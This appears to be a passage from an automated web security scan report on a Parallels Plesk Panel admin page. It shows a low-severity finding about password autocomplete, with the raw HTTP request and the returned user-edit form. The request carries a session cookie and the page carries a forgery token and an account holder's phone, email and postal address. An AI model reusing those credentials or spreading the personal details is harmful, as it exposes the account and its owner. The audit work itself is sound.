new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/2

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /smb/user/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:34 GMT
Connection: close
Content-Length: 45694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Hoyt LLC Research - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F2' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>Hoyt LLC Research</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId" disabled="1">
<option value="5" label="Owner" selected="selected">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" disabled="disabled" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="Åland Islands">Åland Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
<option value="BI" label="Burundi">Burundi</option>
<option value="KH" label="Cambodia">Cambodia</option>
<option value="CM" label="Cameroon">Cameroon</option>
<option value="CA" label="Canada">Canada</option>
<option value="CV" label="Cape Verde">Cape Verde</option>
<option value="KY" label="Cayman Islands">Cayman Islands</option>
<option value="CF" label="Central African Republic">Central African Republic</option>
<option value="TD" label="Chad">Chad</option>
<option value="CL" label="Chile">Chile</option>
<option value="CN" label="China">China</option>
<option value="CX" label="Christmas Island">Christmas Island</option>
<option value="CC" label="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
<option value="CO" label="Colombia">Colombia</option>
<option value="KM" label="Comoros">Comoros</option>
<option value="CG" label="Congo">Congo</option>
<option value="CD" label="Congo, the Democratic Republic of the">Congo, the Democratic Republic of the</option>
<option value="CK" label="Cook Islands">Cook Islands</option>
<option value="CR" label="Costa Rica">Costa Rica</option>
<option value="CI" label="Cote D'Ivoire">Cote D'Ivoire</option>
<option value="HR" label="Croatia">Croatia</option>
<option value="CU" label="Cuba">Cuba</option>
<option value="CY" label="Cyprus">Cyprus</option>
<option value="CZ" label="Czech Republic">Czech Republic</option>
<option value="DK" label="Denmark">Denmark</option>
<option value="DJ" label="Djibouti">Djibouti</option>
<option value="DM" label="Dominica">Dominica</option>
<option value="DO" label="Dominican Republic">Dominican Republic</option>
<option value="EC" label="Ecuador">Ecuador</option>
<option value="EG" label="Egypt">Egypt</option>
<option value="SV" label="El Salvador">El Salvador</option>
<option value="GQ" label="Equatorial Guinea">Equatorial Guinea</option>
<option value="ER" label="Eritrea">Eritrea</option>
<option value="EE" label="Estonia">Estonia</option>
<option value="ET" label="Ethiopia">Ethiopia</option>
<option value="FK" label="Falkland Islands (Malvinas)">Falkland Islands (Malvinas)</option>
<option value="FO" label="Faroe Islands">Faroe Islands</option>
<option value="FJ" label="Fiji">Fiji</option>
<option value="FI" label="Finland">Finland</option>
<option value="FR" label="France">France</option>
<option value="GF" label="French Guiana">French Guiana</option>
<option value="PF" label="French Polynesia">French Polynesia</option>
<option value="TF" label="French Southern Territories">French Southern Territories</option>
<option value="GA" label="Gabon">Gabon</option>
<option value="GM" label="Gambia">Gambia</option>
<option value="GE" label="Georgia">Georgia</option>
<option value="DE" label="Germany">Germany</option>
<option value="GH" label="Ghana">Ghana</option>
<option value="GI" label="Gibraltar">Gibraltar</option>
<option value="GR" label="Greece">Greece</option>
<option value="GL" label="Greenland">Greenland</option>
<option value="GD" label="Grenada">Grenada</option>
<option value="GP" label="Guadeloupe">Guadeloupe</option>
<option value="GU" label="Guam">Guam</option>
<option value="GT" label="Guatemala">Guatemala</option>
<option value="GG" label="Guernsey">Guernsey</option>
<option value="GN" label="Guinea">Guinea</option>
<option value="GW" label="Guinea-Bissau">Guinea-Bissau</option>
<option value="GY" label="Guyana">Guyana</option>
<option value="HT" label="Haiti">Haiti</option>
<option value="HM" label="Heard Island and McDonald Islands">Heard Island and McDonald Islands</option>
<option value="VA" label="Holy See (Vatican City State)">Holy See (Vatican City State)</option>
<option value="HN" label="Honduras">Honduras</option>
<option value="HK" label="Hong Kong">Hong Kong</option>
<option value="HU" label="Hungary">Hungary</option>
<option value="IS" label="Iceland">Iceland</option>
<option value="IN" label="India">India</option>
<option value="ID" label="Indonesia">Indonesia</option>
<option value="IR" label="Iran, Islamic Republic of">Iran, Islamic Republic of</option>
<option value="IQ" label="Iraq">Iraq</option>
<option value="IE" label="Ireland">Ireland</option>
<option value="IM" label="Isle of Man">Isle of Man</option>
<option value="IL" label="Israel">Israel</option>
<option value="IT" label="Italy">Italy</option>
<option value="JM" label="Jamaica">Jamaica</option>
<option value="JP" label="Japan">Japan</option>
<option value="JE" label="Jersey">Jersey</option>
<option value="JO" label="Jordan">Jordan</option>
<option value="KZ" label="Kazakhstan">Kazakhstan</option>
<option value="KE" label="Kenya">Kenya</option>
<option value="KI" label="Kiribati">Kiribati</option>
<option value="KP" label="Korea, Democratic People's Republic of">Korea, Democratic People's Republic of</option>
<option value="KR" label="Korea, Republic of">Korea, Republic of</option>
<option value="KW" label="Kuwait">Kuwait</option>
<option value="KG" label="Kyrgyzstan">Kyrgyzstan</option>
<option value="LA" label="Lao People's Democratic Republic">Lao People's Democratic Republic</option>
<option value="LV" label="Latvia">Latvia</option>
<option value="LB" label="Lebanon">Lebanon</option>
<option value="LS" label="Lesotho">Lesotho</option>
<option value="LR" label="Liberia">Liberia</option>
<option value="LY" label="Libyan Arab Jamahiriya">Libyan Arab Jamahiriya</option>
<option value="LI" label="Liechtenstein">Liechtenstein</option>
<option value="LT" label="Lithuania">Lithuania</option>
<option value="LU" label="Luxembourg">Luxembourg</option>
<option value="MO" label="Macao">Macao</option>
<option value="MK" label="Macedonia, the Former Yugoslav Republic of">Macedonia, the Former Yugoslav Republic of</option>
<option value="MG" label="Madagascar">Madagascar</option>
<option value="MW" label="Malawi">Malawi</option>
<option value="MY" label="Malaysia">Malaysia</option>
<option value="MV" label="Maldives">Maldives</option>
<option value="ML" label="Mali">Mali</option>
<option value="MT" label="Malta">Malta</option>
<option value="MH" label="Marshall Islands">Marshall Islands</option>
<option value="MQ" label="Martinique">Martinique</option>
<option value="MR" label="Mauritania">Mauritania</option>
<option value="MU" label="Mauritius">Mauritius</option>
<option value="YT" label="Mayotte">Mayotte</option>
<option value="MX" label="Mexico">Mexico</option>
<option value="FM" label="Micronesia, Federated States of">Micronesia, Federated States of</option>
<option value="MD" label="Moldova, Republic of">Moldova, Republic of</option>
<option value="MC" label="Monaco">Monaco</option>
<option value="MN" label="Mongolia">Mongolia</option>
<option value="ME" label="Montenegro">Montenegro</option>
<option value="MS" label="Montserrat">Montserrat</option>
<option value="MA" label="Morocco">Morocco</option>
<option value="MZ" label="Mozambique">Mozambique</option>
<option value="MM" label="Myanmar">Myanmar</option>
<option value="NA" label="Namibia">Namibia</option>
<option value="NR" label="Nauru">Nauru</option>
<option value="NP" label="Nepal">Nepal</option>
<option value="NL" label="Netherlands">Netherlands</option>
<option value="AN" label="Netherlands Antilles">Netherlands Antilles</option>
<option value="NC" label="New Caledonia">New Caledonia</option>
<option value="NZ" label="New Zealand">New Zealand</option>
<option value="NI" label="Nicaragua">Nicaragua</option>
<option value="NE" label="Niger">Niger</option>
<option value="NG" label="Nigeria">Nigeria</option>
<option value="NU" label="Niue">Niue</option>
<option value="NF" label="Norfolk Island">Norfolk Island</option>
<option value="MP" label="Northern Mariana Islands">Northern Mariana Islands</option>
<option value="NO" label="Norway">Norway</option>
<option value="OM" label="Oman">Oman</option>
<option value="PK" label="Pakistan">Pakistan</option>
<option value="PW" label="Palau">Palau</option>
<option value="PS" label="Palestinian Territory, Occupied">Palestinian Territory, Occupied</option>
<option value="PA" label="Panama">Panama</option>
<option value="PG" label="Papua New Guinea">Papua New Guinea</option>
<option value="PY" label="Paraguay">Paraguay</option>
<option value="PE" label="Peru">Peru</option>
<option value="PH" label="Philippines">Philippines</option>
<option value="PN" label="Pitcairn">Pitcairn</option>
<option value="PL" label="Poland">Poland</option>
<option value="PT" label="Portugal">Portugal</option>
<option value="PR" label="Puerto Rico">Puerto Rico</option>
<option value="QA" label="Qatar">Qatar</option>
<option value="RE" label="Reunion">Reunion</option>
<option value="RO" label="Romania">Romania</option>
<option value="RU" label="Russian Federation">Russian Federation</option>
<option value="RW" label="Rwanda">Rwanda</option>
<option value="BL" label="Saint Barthelemy">Saint Barthelemy</option>
<option value="SH" label="Saint Helena, Ascension and Tristan da Cunha">Saint Helena, Ascension and Tristan da Cunha</option>
<option value="KN" label="Saint Kitts and Nevis">Saint Kitts and Nevis</option>
<option value="LC" label="Saint Lucia">Saint Lucia</option>
<option value="MF" label="Saint Martin">Saint Martin</option>
<option value="PM" label="Saint Pierre and Miquelon">Saint Pierre and Miquelon</option>
<option value="VC" label="Saint Vincent and the Grenadines">Saint Vincent and the Grenadines</option>
<option value="WS" label="Samoa">Samoa</option>
<option value="SM" label="San Marino">San Marino</option>
<option value="ST" label="Sao Tome and Principe">Sao Tome and Principe</option>
<option value="SA" label="Saudi Arabia">Saudi Arabia</option>
<option value="SN" label="Senegal">Senegal</option>
<option value="RS" label="Serbia">Serbia</option>
<option value="SC" label="Seychelles">Seychelles</option>
<option value="SL" label="Sierra Leone">Sierra Leone</option>
<option value="SG" label="Singapore">Singapore</option>
<option value="SK" label="Slovakia">Slovakia</option>
<option value="SI" label="Slovenia">Slovenia</option>
<option value="SB" label="Solomon Islands">Solomon Islands</option>
<option value="SO" label="Somalia">Somalia</option>
<option value="ZA" label="South Africa">South Africa</option>
<option value="GS" label="South Georgia and the South Sandwich Islands">South Georgia and the South Sandwich Islands</option>
<option value="ES" label="Spain">Spain</option>
<option value="LK" label="Sri Lanka">Sri Lanka</option>
<option value="SD" label="Sudan">Sudan</option>
<option value="SR" label="Suriname">Suriname</option>
<option value="SJ" label="Svalbard and Jan Mayen">Svalbard and Jan Mayen</option>
<option value="SZ" label="Swaziland">Swaziland</option>
<option value="SE" label="Sweden">Sweden</option>
<option value="CH" label="Switzerland">Switzerland</option>
<option value="SY" label="Syrian Arab Republic">Syrian Arab Republic</option>
